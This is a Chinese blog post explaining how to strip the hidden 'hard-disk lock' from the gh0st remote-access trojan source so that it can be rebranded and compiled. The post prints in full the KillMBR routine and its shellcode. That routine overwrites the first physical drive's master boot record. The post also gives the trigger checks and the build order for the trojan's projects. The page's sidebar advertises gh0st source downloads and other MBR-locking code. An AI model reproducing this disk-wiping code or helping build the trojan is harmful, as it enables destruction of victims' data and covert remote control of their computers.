gh0st去硬盘锁

最新推荐文章于 2021-08-31 22:26:35 发布
最新推荐文章于 2021-08-31 22:26:35 发布
阅读量172 收藏 1
点赞数
这几天闲来无事,下载了个 gh0st 源码,由于刚开始没有仔细看是否去了硬盘锁,差点整个硬盘都费了。

gh0st硬盘锁是源码的作者为了保护版权而设置的,如果我们直接更改版权会造成硬盘被锁,中了硬盘锁的后果是非常严重的,特别是你电脑里有重要数据的时候,这样会导致你电脑里的数据全部丢失!
如果你没去硬盘锁,又改了版权,那么打开gh0st控制端后会一闪就关闭了,这样就是中硬盘锁了,中了硬盘锁之后将不能重装系统,只能重新对硬盘进行分区。

gh0st去硬盘锁其实很简单,主要分为以下几部:

1ghost.cpp文件中注释或删除以下代码(可以搜索这段代码unsignedcharscode[]=

/*
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";

int CGh0stApp::KillMBR()
{
	HANDLE hDevice;
	DWORD dwBytesWritten, dwBytesReturned;
	BYTE pMBR[512] = {0};
	
	// 重新构造MBR
	memcpy(pMBR, scode, sizeof(scode) - 1);
	pMBR[510] = 0x55;
	pMBR[511] = 0xAA;
	
	hDevice = CreateFile
		(
		"\\\\.\\PHYSICALDRIVE0",
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		0,
		NULL
		);
	if (hDevice == INVALID_HANDLE_VALUE)
		return -1;
	DeviceIoControl
		(
		hDevice, 
		FSCTL_LOCK_VOLUME, 
		NULL, 
		0, 
		NULL, 
		0, 
		&dwBytesReturned, 
		NULL
		);
	// 写入病毒内容
	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
	DeviceIoControl
		(
		hDevice, 
		FSCTL_UNLOCK_VOLUME, 
		NULL, 
		0, 
		NULL, 
		0, 
		&dwBytesReturned, 
		NULL
		);
	CloseHandle(hDevice);

	ExitProcess(-1);
	return 0;
}
*/


2BuildView.cpp文件中注释或删除以下代码

	/*
		char	strVer[10];
		char	strTitle[10];

		strVer[0] = 'C';
		strVer[1] = '.';
		strVer[2] = 'R';
		strVer[3] = 'u';
		strVer[4] = 'f';
		strVer[5] = 'u';
		strVer[6] = 's';
		strVer[7] = ' ';
		strVer[8] = 'S';
		strVer[9] = '\0';

		strTitle[0] = 'G';
		strTitle[1] = 'h';
		strTitle[2] = '0';
		strTitle[3] = 's';
		strTitle[4] = 't';
		strTitle[5] = ' ';
		strTitle[6] = 'R';
		strTitle[7] = 'A';
		strTitle[8] = 'T';
		strTitle[9] = '\0';

		CString str;
		GetDlgItemText(IDC_STATIC_VER, str);
		if (str.Find(strVer) == -1)
			((CGh0stApp *)AfxGetApp())->KillMBR();

		GetParent()->GetWindowText(str);
		if (str.Find(strTitle) == -1)
			((CGh0stApp *)AfxGetApp())->KillMBR();
		*/


3ghost.h文件中注释或删除以下代码

//int KillMBR();


即注释或删除出现KillMBR4处。

编译顺序从下往上依次编译,即先svchostfiles工程,然后installfiles工程,最后ghostfiles工程

iteye_21199
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
gh0st源码/去除硬盘和驱动/未做其它修改
06-19
已经去除了硬盘和驱动的gh0st远控, 没有对代码进行其它的任何修改, 保持原汁原味
硬盘程序源码
ZK_APPLE的专栏
04-11 2287
硬盘程序      些硬盘程序有两部分组成:安装程序的install.exe和硬盘程序数据文件。这个程序是我改写了江民硬盘程序而得到的。由于此网页编排上有些问题,所以复制这上面的代码可能编释出错。所以你可以在我的网站上去下载:http://www.fullpassion.cn/HDprogramming/hdlock.htm  Hdlock的安装程序
硬盘逻辑病毒源代码分析&恢复方法-HeiBai.Org
Lzers
01-12 1579
先研究一下硬盘逻辑代码。主要是重构MBR以及写入。 附上代码: #include#include#include#include//这一段是 shellcode 可以修改// I am virus! Fuck you unsigned char scode[] ="\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x...
mbr硬盘c语言源码,今日头一贴!修改MBR引导区,让你的电脑嗝屁!嗝屁!
weixin_42510835的博客
05-21 1469
运行之前 请三思 ,,,,记得做好备份,最好是在虚拟机中测试,(一定要在虚拟机中测试)申明该代码作为学习研究用处,至于拿这个代码去搞破坏以及恶搞造成的后果你自己承担,作者不承担任何责任,驿站不承担任何责任,不承担任何责任,所有想研究之前三思,改代码有详细的注释,并且在W7以及XP中运行过XP以上的平台,请使用管理权限,运行之后你就面对疾风吧!#include #includeusing nam...
Gh0st3.6_去硬盘源码
03-17
Gh0st3.6_去硬盘源码
Gh0st3.6+已去除硬盘+win7.zip
08-13
Gh0st3.6+已去除硬盘+win7
Gh0st源码+去硬盘
12-12
注: 软件不断更新中,有什么意见大家多多提,偶看可以的就采纳.....gh0st的成长,离不开大家的帮助. 2008/1/27 11:16 : 优化了屏幕传输算法,CPU利用率更低 2008/1/27 16:06 : 驱动以资源方式写入安装文件跟DLL文件中,...
gh0st3.6_已去硬盘_20210202_VS2017编译通过_注意杀毒软件.rar
03-03
Gh0st3.6版本,已屏蔽硬盘,WIN10+VS2017 Console版本编译通过
Gh0st3.6原版(未经修改,记得去硬盘哦).rar
12-13
Gh0st3.6原版(未经修改,记得去硬盘哦).rar
硬盘逻辑汇编源码
11-17
汇编硬盘超强代码,毁灭性机,谨慎使用
骷髅头硬盘源码
08-31
很强大的硬盘
主页_带源码
06-27
本软件为:一键设置主页_效果不错,带源码!放心使用.
易语言Elanguage终极硬盘源码
08-01
易语言Elanguage终极硬盘源码 可以住对方的机子
Gh0st Rat BetaV3.6源码+程序(去硬盘).7z
06-21
其它细节方面的功能大家自己去发现吧 功能: 文件管理 完全仿Radmin所写, 文件、文件夹批量上传、删除、下载、创建、重命名 屏幕监视 扫描算法速度最快可达到120帧/秒,差异算法适合网络极差的情况下传输,传输速度快...
硬盘逻辑源码
jfjfj6666的博客
08-31 3037
.版本 2 .支持库 spec .支持库 dp1 字节集密码 = 到字节集 (密码) .如果真 (字节集密码 = { 0 }) 返回的错误 = “密码不可以为空的!!” 返回 (假) .如果真结束 .如果真 (取字节集长度 (字节集密码) ≥ 18) 返回的错误 = “密码不能超过18位!!!!!” 返回 (假) .如果真结束 .如果真 (是否为空 (自定义显示信息)) 自定义显示信息 = { 66, 121, 58, 32, 78, 84, 83, 69, 67,...
Gh0st源码学习(二)去除硬盘和驱动
liujiayu2的专栏
05-26 1800
一、去除硬盘   GH0st硬盘是源码的作者为了保护版权而设置的,如果我们直接更改版权会造成硬盘   中了硬盘的后果是非常严重的,特别是你电脑里有重要数据的时候,这样会导致你电脑里的数据全部丢失!    1、搜索    unsigned char scode[] =     位置:\Gh0st3.6原版\gh0st\gh0st.cpp(220):unsigned char sco
gh0st源码去硬盘与驱动
record
12-13 895
硬盘: 1.打开源文件gh0st.cpp(搜索unsigned char scode[] =) 注释以下部分: /*    unsigned char scode[] =    "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"    "\x00\xba\x1d\x0e\xcd\x10\xe2\
gh0st alpha
最新发布
12-23
gh0st alpha是一种计算机病毒或恶意软件。这种病毒可以通过多种途径传播,例如电子邮件附件、下载的文件、感染的移动设备等。一旦感染了计算机系统,gh0st alpha会悄无声息地操控受感染的设备,窃取个人信息、密码和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值